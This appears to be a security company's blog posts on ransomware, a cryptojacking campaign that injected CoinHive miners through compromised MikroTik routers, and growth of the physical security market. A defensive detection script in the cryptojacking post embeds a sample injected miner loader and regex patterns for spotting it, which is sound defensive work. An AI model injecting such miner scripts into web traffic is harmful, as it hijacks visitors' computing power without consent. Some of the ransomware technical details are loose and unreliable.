Ransomware: Present and Future

Modern ransomware is a form of cryptomalware that encrypts the contents of the target hard drive, and potentially every storage medium reachable over the network, and then demands payment for decryption. Infection is accomplished through traditional threat vectors that lead a user to execute the malware, which then begins encrypting.

After infection, the malware runs its encryption routine using standard cryptographic primitives (RSA, SHA-256), locks down the infected machine and/or network, and demands payment, generally in cryptocurrency. Paying may or may not actually result in the decryption of the affected files. If the victim complies and sends payment, the threat actor (ideally) releases the private half of the public/private key pair that was used to encrypt the victim's drives.

These attacks have a proven track record for attackers and have resulted in some big payouts, the most notable and well known being the cryptomalware attack against the Hollywood Presbyterian Medical Center and other hospitals. These attacks almost always come with a time limit: if payment has not been made by then, the private key is lost forever and every file remains uselessly scrambled and locked, so it is not uncommon for institutions to actually pay up. Because the ransom is generally within a “reasonable” range for the targeted institution, considering what is at risk of being lost, it is understandable that stress and urgency would drive such a decision. Of course, U.S. intelligence sources never suggest cooperating with demands.

According to the FBI, ransomware takes in over $1 billion annually in payments alone, with a much larger sum devoted to the costs of remediation. Of course, an ounce of prevention is worth a pound of cure, but because security and convenience relate to each other inversely, we will never be able to fully implement the level of prophylactic security care necessary to stop these kinds of threats from reaching our terminals and workstations entirely.

So what are the options once infection has occurred?

1. If you have a recent backup, and the infection is local enough and not spread over an entire network, you can simply purge and re-image the affected machine. If not…

2. Lose your data, or pay up and hope for the best.

Sad as it sounds, those really are the only options available at that point. If you choose to go the route of paying the ransom and hoping for honesty from your attacker, the process generally plays out as follows.

- When the ransomware encrypted your files, it generated a secret key file (private key) and stored it somewhere on your machine.

- Therefore, you must locate and upload this file or data string to the attacker along with the demanded payment in cryptocurrency.

- If they are “honorable” thieves, they process the result and send you a decryption key.

I can only imagine this to be a greatly disheartening process. Incredibly, some cryptomalware platforms even offer a discount on your decryption if you will “infect a friend”.

Moving into the future, we should expect to see ransomware written so that it no longer needs direct human interaction during the key exchange and payment process. So-called autonomous ransomware eliminates the risky element of one-to-one communication with infected targets, where the attacker is exposed to higher risk.

There is so much more to say about this topic, but the essentials of what an enterprise needs to know have mostly been summed up here. Because these cryptomalware attacks generally target the enterprise over the individual in search of the biggest payout possible, organizations need to be aware that threat actors have them in their sights, eagerly waiting for a slip-up that lets them take your files, machines, and networks hostage.

———————————————————————————————————-

Security Technology of South Texas

Contact us at admin@gostst.com

or call 24/7 (210)-446-4863

———————————————————————————————————-

Sources:

grahamcluley.com

blog.cryptographyengineering.com

Cryptojacking Attack Infects Thousands of ISP-Grade Routers

Cryptomining attack scripts, sometimes referred to as cryptojacking, are a subtle form of malware designed to harness the power of your CPU to mine cryptocurrency for those who deploy them. This malware can be spread through infected files and the usual vectors of transmission. Cryptomining can also take place, with or without your tacit consent, on websites, especially those associated with torrenting and distribution of copyrighted materials.

In this case however, a more sophisticated approach has been taken in an effort to spread the reach of the mining campaign through compromising industrial, ISP-grade routers. A hacking campaign has compromised “tens of thousands of MikroTik routers to embed Coinhive cryptomining scripts in websites using a known vulnerability.” (threatpost.com)

Censys.io reports that over 170,000 active MikroTik devices were infected with the CoinHive site-key (a single site-key was found across all infections, which indicates that a single entity is behind the attacks). Although the campaign appeared to originally target Brazil, infections are still growing internationally. A search on Shodan (a search engine for security researchers) shows a growing number, in the tens of thousands, of compromised routers outside of Brazil.

MikroTik routers are employed by large enterprises and ISPs to serve web pages to many thousands of users each day. This means that each compromised device could pay out big for the threat actor.

“This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible,” Trustwave researcher Simon Kenin wrote. “This attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale.”

“We’re … talking about potentially millions of daily pages for the attacker,” Kenin wrote. “The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end-user computers, they would go straight to the source: carrier-grade router devices.”

————————————————————————————–

Known Vulnerabilities

Because the attack capitalizes on a known vulnerability, it is a prime example of what enterprises of all sizes risk when they delay or block the installation of vendor patches. The attack takes advantage of a vulnerability that MikroTik had already fixed in a previous patch.

Whoever is behind the attack, it appears they have an intimate understanding of the functionality of this particular router.

“Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited,” explained Kenin.

Any MikroTik router user should make sure that their RouterOS is current with security patches, lest they fall prey to this latest cryptojacking campaign.

The end user still has a few options as well: cryptojacking can be halted in the web browser itself with a blocking extension (MinerBlock) or at the local firewall (CoinBlockerLists). Because the CoinHive script is injected into HTTP traffic, it can generally be avoided by forcing requests to be made over the secure version, HTTPS, depending of course on whether the site being accessed supports it.
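The injection described above leaves a recognizable fingerprint in the HTTP response body: a loader for coinhive.min.js followed by a miner started with a site-key. The script below is an added example for defenders (our own illustration, not code from Trustwave, Censys or Threatpost). It scans captured HTTP responses for that fingerprint, pulls out the site-key, counts how many pages share one key (the same reasoning Censys used to conclude a single actor was behind the campaign), and flags whether the page was fetched over plain HTTP, the only channel an in-path router can inject into. The sample responses, hostnames and the site-key value are constructed placeholders, and the exact CoinHive snippet shape is assumed from the public loader of that era.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample HTTP responses (url, body). Hostnames use the reserved
# .test TLD and the site-key is a placeholder, not a real CoinHive key.
SAMPLE_RESPONSES = [
    ("http://isp-customer-site.test/index.html",
     '<html><head><title>Home</title>'
     '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
     "<script>var miner = new CoinHive.Anonymous('PLACEHOLDER_SITE_KEY_1234');"
     "miner.start();</script></head><body>Welcome</body></html>"),
    ("http://another-site.test/news",
     '<html><body><p>News</p>'
     '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
     '<script>var miner=new CoinHive.Anonymous("PLACEHOLDER_SITE_KEY_1234",'
     '{throttle:0.3});miner.start();</script></body></html>'),
    ("https://clean-site.test/",
     "<html><body><p>Nothing injected here</p></body></html>"),
]

# A <script> tag whose src ends in coinhive.min.js (assumed loader shape).
LOADER_RE = re.compile(r'<script[^>]+src=["\'][^"\']*coinhive\.min\.js["\']', re.I)
# The site-key passed to the miner constructor (assumed snippet shape).
SITEKEY_RE = re.compile(r'CoinHive\.Anonymous\(\s*["\']([A-Za-z0-9_-]+)["\']', re.I)


def scan_response(url, body):
    """Inspect one HTTP response; return a finding dict or None if clean."""
    if not LOADER_RE.search(body):
        return None
    match = SITEKEY_RE.search(body)
    return {
        "url": url,
        # Injection by an in-path router is only possible on unencrypted HTTP.
        "plain_http": urlparse(url).scheme.lower() == "http",
        "site_key": match.group(1) if match else None,
    }


def scan_all(responses):
    """Scan every (url, body) pair; return findings and a per-site-key tally."""
    findings = [f for f in (scan_response(u, b) for u, b in responses) if f]
    key_counts = Counter(f["site_key"] for f in findings if f["site_key"])
    return findings, key_counts


def single_actor_suspected(key_counts):
    """True when every miner seen shares one site-key (all payouts to one account)."""
    return len(key_counts) == 1


if __name__ == "__main__":
    findings, key_counts = scan_all(SAMPLE_RESPONSES)
    for f in findings:
        transport = "HTTP" if f["plain_http"] else "HTTPS"
        print(f"{f['url']} [{transport}] site-key={f['site_key']}")
    print("site-key tally:", dict(key_counts))
    print("single actor suspected:", single_actor_suspected(key_counts))
```

Run it over real response bodies by replacing SAMPLE_RESPONSES with pairs pulled from a proxy log or packet capture; a hit on a page that is supposed to be static is a strong sign the path, not the site, is compromised.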

Source: Threatpost.com


$119.4 Billion: Projected Growth of Physical Security Market by 2023

Simply put, the physical security market consists of all the security solutions you can walk up to and touch. Cameras, virtual gate guard systems, HOA management systems and more all have elements of physical security. Of course, because all of these solutions are deeply integrated with network and cloud-based technologies, cybersecurity could be considered equally important, but it is not what we are looking at in this article.

As risk continues to rise, with rapid progress sometimes leaving vulnerabilities unchecked, the demand for physical security, the tried and true barrier between real assets and those seeking to steal or destroy them, will grow along with the risk.

A combination of fear generated from media responses to so-called “terror attacks”, advancements in tech in general, and the growing use of IP cameras to perform video surveillance are expected to push the growth of the physical security market worldwide.

According to this report (https://www.researchandmarkets.com/research/snkm2j/global_physical?w=5), the market is expected to grow from $84.1 billion in 2018 to $119.4 billion by 2023, a CAGR (compound annual growth rate) of 7.3%.

The report details how the services segment of the market is expected to have the fastest growth rate. Such services are indispensable for enhancing existing video surveillance through digital (IP) solutions and integrating them with modern IT and network environments.

Of course, the larger enterprises are expected to be at the bleeding edge as this all occurs over the next few years, but this doesn’t mean that small or medium businesses need to miss out. While the big players have the greatest pools of revenue to draw from and more infrastructure to protect, the smaller enterprises can see just as much or greater benefit by implementing integrated IP-based physical security sooner rather than later. The best time to step up your security will always be before the attack comes, and not as a reactive measure.

Security Technology of South Texas is a leading provider of cutting-edge physical security products. We have the experience and attention to detail to give you the best for your money when it comes to IP cameras, access control solutions, monitored video, and more.

Source: https://securitytoday.com
